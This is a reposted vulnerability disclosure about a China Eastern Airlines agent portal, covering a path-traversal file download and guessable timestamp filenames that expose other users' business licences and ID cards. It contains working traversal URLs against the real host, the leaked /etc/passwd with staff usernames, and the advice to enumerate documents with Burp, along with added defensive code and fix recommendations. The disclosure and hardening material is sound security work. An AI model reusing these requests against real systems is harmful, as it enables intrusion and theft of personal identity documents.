神刀安全网

Vulnerability title: Arbitrary file traversal on a China Eastern Airlines (东航) site, with access to other users' credential documents (business license / legal representative ID card / tax registration certificate / CATA (中航协) qualification certificate)

Vulnerability details

Disclosure status:

2016-01-27: Details sent to the vendor, awaiting vendor handling
2016-01-27: Vendor has confirmed; details disclosed to the vendor only
2016-02-06: Details disclosed to core white hats and relevant domain experts
2016-02-16: Details disclosed to regular white hats
2016-02-26: Details disclosed to intern white hats
2016-03-10: Details disclosed to the public

Brief description:

Hey China Eastern, time to fix a hole: arbitrary file download, and you can read other people's credential documents too~~

Detailed description:

http://ceagent.ceair.com

Register an account.


Files of any type can be uploaded here.


Intercepted the upload in Burp and changed the extension; the upload succeeded, but because files are downloaded via POST parameters, the uploaded file cannot be parsed by the server and just sits quietly on disk.

But I found that this POST can be changed to a GET, and the GET request uses a system directory path as its parameter, so I guessed straight away that arbitrary file download was possible. It worked.

Code:
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/license_20160126173411.php

Code:
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/passwd

Code:
HTTP/1.1 200 OK
Date: Tue, 26 Jan 2016 10:01:49 GMT
Server: Apache
ETag: 1231047008
Content-Disposition: attachment;filename="passwd"
Connection: close
Content-Type: text/plain
Content-Language: zh-UTF-8
Content-Length: 2686

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:100:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
hw:x:500:500:hw:/home/hw:/bin/bash
was7:x:3011:301::/home/was7:/bin/bash
rduser:x:2011:201::/home/rduser:/bin/bash
itimadmin:x:11014:11014::/home/itimadmin:/bin/bash
administrator:x:11016:11016::/home/administrator:/bin/bash
etdftp:x:11017:11017::/home/etdftp:/bin/bash
ora11g:x:11018:11018::/home/ora11g:/bin/bash
yxuser:x:11019:11019::/home/yxuser:/bin/bash
wang_yl:x:10001:400::/home/wang_yl:/bin/bash
zyjin:x:10002:400::/home/zyjin:/bin/bash
zhoujie:x:10003:400::/home/zhoujie:/bin/bash
apwang:x:10004:400::/home/apwang:/bin/bash
yaohy:x:10005:400::/home/yaohy:/bin/bash
huangqin:x:10006:400::/home/huangqin:/bin/bash
yongzhou:x:10007:400::/home/yongzhou:/bin/bash
yxhuang:x:10008:400::/home/yxhuang:/bin/bash
wtliu:x:10009:400::/home/wtliu:/bin/bash
zytao:x:10010:400::/home/zytao:/bin/bash
cjchen:x:10012:400::/home/cjchen:/bin/bash
jjjin:x:10013:400::/home/jjjin:/bin/bash
huanglei1:x:10014:400::/home/huanglei1:/bin/bash
zhangjinliang:x:10015:400::/home/zhangjinliang:/bin/bash
yuegao:x:10016:400::/home/yuegao:/bin/bash
observer:x:2013:201::/home/observer:/bin/bash
rdsys:x:2015:201::/home/rdsys:/bin/bash

Code:
HTTP/1.1 200 OK
Date: Tue, 26 Jan 2016 10:01:53 GMT
Server: Apache
ETag: 1758226636
Content-Disposition: attachment;filename="httpd"
Connection: close
Content-Type: text/plain
Content-Language: zh-UTF-8
Content-Length: 3200

#!/bin/bash
#
# httpd Startup script for the Apache HTTP Server
#
# chkconfig: - 85 15
# description: Apache is a World Wide Web server. It is used to serve /
# HTML files and CGI.
# processname: httpd
# config: /etc/httpd/conf/httpd.conf
# config: /etc/sysconfig/httpd
# pidfile: /var/run/httpd.pid

# Source function library.
. /etc/rc.d/init.d/functions

if [ -f /etc/sysconfig/httpd ]; then
. /etc/sysconfig/httpd
fi

# Start httpd in the C locale by default.
HTTPD_LANG=${HTTPD_LANG-"C"}

# This will prevent initlog from swallowing up a pass-phrase prompt if
# mod_ssl needs a pass-phrase from the user.
INITLOG_ARGS=""

# Set HTTPD=/usr/sbin/httpd.worker in /etc/sysconfig/httpd to use a server
# with the thread-based "worker" MPM; BE WARNED that some modules may not
# work correctly with a thread-based MPM; notably PHP will refuse to start.

# Path to the apachectl script, server binary, and short-form for messages.
apachectl=/usr/sbin/apachectl
httpd=${HTTPD-/usr/sbin/httpd}
prog=httpd
pidfile=${PIDFILE-/var/run/httpd.pid}
lockfile=${LOCKFILE-/var/lock/subsys/httpd}
RETVAL=0

# check for 1.3 configuration
check13 () {
CONFFILE=/etc/httpd/conf/httpd.conf
GONE="(ServerType|BindAddress|Port|AddModule|ClearModuleList|"
GONE="${GONE}AgentLog|RefererLog|RefererIgnore|FancyIndexing|"
GONE="${GONE}AccessConfig|ResourceConfig)"
if LANG=C grep -Eiq "^[[:space:]]*($GONE)" $CONFFILE; then
echo
echo 1>&2 " Apache 1.3 configuration directives found"
echo 1>&2 " please read /usr/share/doc/httpd-2.2.3/migration.html"
failure "Apache 1.3 config directives test"
echo
exit 1
fi
}

# The semantics of these two functions differ from the way apachectl does
# things -- attempting to start while running is a failure, and shutdown
# when not running is also a failure. So we just do it the way init scripts
# are expected to behave here.
start() {
echo -n $"Starting $prog: "
check13 || exit 1
LANG=$HTTPD_LANG daemon $httpd $OPTIONS
RETVAL=$?
echo
[ $RETVAL = 0 ] && touch ${lockfile}
return $RETVAL
}

# When stopping httpd a delay of >10 second is required before SIGKILLing the
# httpd parent; this gives enough time for the httpd parent to SIGKILL any
# errant children.
stop() {
echo -n $"Stopping $prog: "
killproc -d 10 $httpd
RETVAL=$?
echo
[ $RETVAL = 0 ] && rm -f ${lockfile} ${pidfile}
}
reload() {
echo -n $"Reloading $prog: "
if ! LANG=$HTTPD_LANG $httpd $OPTIONS -t >&/dev/null; then
RETVAL=$?
echo $"not reloading due to configuration syntax error"
failure $"not reloading $httpd due to configuration syntax error"
else
killproc $httpd -HUP
RETVAL=$?
fi
echo
}

# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
status)
status $httpd
RETVAL=$?
;;
restart)
stop
start
;;
condrestart)
if [ -f ${pidfile} ] ; then
stop
start
fi
;;
reload)
reload
;;
graceful|help|configtest|fullstatus)
$apachectl $@
RETVAL=$?
;;
*)
echo $"Usage: $prog {start|stop|restart|condrestart|reload|status|fullstatus|graceful|help|configtest}"
exit 1
esac

exit $RETVAL
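Why the `../` run in the inputPath request above lands on /etc/passwd, and the containment check a download action should apply before opening anything. This is an added example, not code from the report or from the ceagent application; UPLOAD_ROOT is the directory visible in the report's URL, while the function names and behaviour are assumptions made for illustration.

```python
"""Path traversal in a download parameter: what the OS sees, and a fix.

Added example, not code from the report or from the ceagent application.
UPLOAD_ROOT is taken from the report's URL; everything else is assumed.
"""
import posixpath
from typing import Optional

# Directory the download action is meant to serve from (from the report's URL).
UPLOAD_ROOT = "/opt/appdata/file/ceagent/front/agency"

# The two inputPath values from the report, reused as sample input.
LEGIT = UPLOAD_ROOT + "/license_20160126173411.php"
TRAVERSAL = UPLOAD_ROOT + "/../../../../../../../etc/passwd"


def vulnerable_resolve(input_path: str) -> str:
    """What the report implies the handler did: the parameter *is* the path.

    Nothing is checked, so the kernel collapses every '..' while opening
    the file and the caller gets whatever the web server user can read.
    """
    return input_path


def os_view(path: str) -> str:
    """The path actually opened once '..' components are collapsed."""
    return posixpath.normpath(path)


def hardened_resolve(input_path: str, root: str = UPLOAD_ROOT) -> Optional[str]:
    """Return the canonical path if it stays inside root, else None.

    Accepts a bare file name or an absolute path (the original parameter
    was absolute), normalizes it, and tests containment on the normalized
    string, never on the raw input.  In a real deployment use
    os.path.realpath as well, so a symlink inside root cannot point outside
    it; posixpath is used here so the example runs without the directory
    existing on the machine.
    """
    if "\x00" in input_path or "\\" in input_path:
        # NUL truncation tricks and Windows separators are rejected outright.
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, input_path))
    # Prefix test with the trailing slash, so that ".../agency_evil" is not
    # mistaken for something under ".../agency".
    if candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    print("vulnerable opens:", os_view(vulnerable_resolve(TRAVERSAL)))
    print("hardened legit:  ", hardened_resolve(LEGIT))
    print("hardened attack: ", hardened_resolve(TRAVERSAL))
```

The containment check must run on the normalized path: a naive `input_path.startswith(UPLOAD_ROOT)` would have passed the traversal payload, because the raw string really does begin with the upload directory.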

Second issue!!!

Not done yet. The above is only an arbitrary file download, and I have not found a way to get a shell, but look at the filename:

Code:
license_20160126173411.php

The filename is built from a timestamp, so other users' credential files can be downloaded at will.

This site probably does not have many users, so I will not spend time brute-forcing it; I suggest fixing it, otherwise brute-forcing with Burp can still expose other people's:

Business license:

Legal representative ID card:

Tax registration certificate:

CATA qualification certificate:


Proof of vulnerability:

Fix recommendations:

1 Validate uploads on the server side by checking the file content and type, not just the extension on the front end. Note that the Content-Type header is also supplied by the client, so it cannot be the only check.

2 Fix the arbitrary file download: restrict access to a fixed directory (checking the normalized path), or filter the parameter, or restrict the access method.

3 Protect other users' credential documents with session-based access control, or add a random token to the filename; do not let filenames be guessed by pattern.
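Server-side handling for recommendations 1 and 3 above: type decided from the file bytes with an extension allowlist, an unguessable storage name in place of the timestamp, and an ownership check on every download. This is an added example, not code from the report or from the ceagent application; the allowlist, the in-memory store and all names are assumptions made for illustration.

```python
"""Upload validation and owner-checked download.

Added example, not code from the report or from the ceagent application;
the allowlist, the in-memory store and all names are assumptions.
"""
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

# Recommendation 1: decide the type from the bytes.  The extension and the
# Content-Type header both arrive from the client, so neither is trusted alone.
MAGIC = {
    b"%PDF-": "pdf",
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
}
ALLOWED = {"pdf", "jpg", "png"}  # assumed allowlist for scanned credential documents


def sniff(data: bytes) -> Optional[str]:
    """Type implied by the leading bytes, or None if not a recognised format."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename: str, data: bytes) -> Optional[str]:
    """Accepted type, or None to reject.

    The extension must agree with the sniffed type, so a PHP payload renamed
    to .pdf and a real PDF named .php are both refused.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = {"jpeg": "jpg"}.get(ext, ext)
    kind = sniff(data)
    if kind is None or kind not in ALLOWED or ext != kind:
        return None
    return kind


# Recommendation 3: an unguessable name plus an ownership check per download.
@dataclass
class StoredFile:
    owner_id: int
    kind: str
    token: str
    data: bytes


class CredentialStore:
    """Stand-in for the table that maps a storage token to the owning user."""

    def __init__(self) -> None:
        self._files: Dict[str, StoredFile] = {}

    def store(self, owner_id: int, filename: str, data: bytes) -> Optional[str]:
        kind = validate_upload(filename, data)
        if kind is None:
            return None
        # 32 random bytes.  A timestamp name has about 86400 candidates per
        # day; this has 2**256, so enumeration with Burp is not feasible.
        # On disk the file would be saved as <token>.<kind> under the upload root.
        token = secrets.token_urlsafe(32)
        self._files[token] = StoredFile(owner_id, kind, token, data)
        return token

    def download(self, session_user_id: int, token: str) -> Optional[StoredFile]:
        rec = self._files.get(token)
        # Same answer for "no such file" and "not your file": the response
        # must not reveal whether a guessed token exists.
        if rec is None or rec.owner_id != session_user_id:
            return None
        return rec


def demo() -> Dict[str, object]:
    """Run the upload/download flow for two users and report the outcomes."""
    store = CredentialStore()
    pdf = b"%PDF-1.4\n% constructed sample, not a real document\n"
    token = store.store(1, "license.pdf", pdf)
    assert token is not None
    return {
        "php_rejected": store.store(1, "shell.php", b"<?php echo 1; ?>") is None,
        "owner_ok": store.download(1, token) is not None,
        "other_user_denied": store.download(2, token) is None,
        "guessed_name_denied": store.download(1, "license_20160126173411") is None,
        "token_len": len(token),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The ownership check is what closes the second finding: even if a token leaked, it only serves the user whose session owns it, and the random name removes the timestamp pattern the report relied on.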

Copyright notice: when reposting, please credit the source: Fencing@乌云 (WooYun)
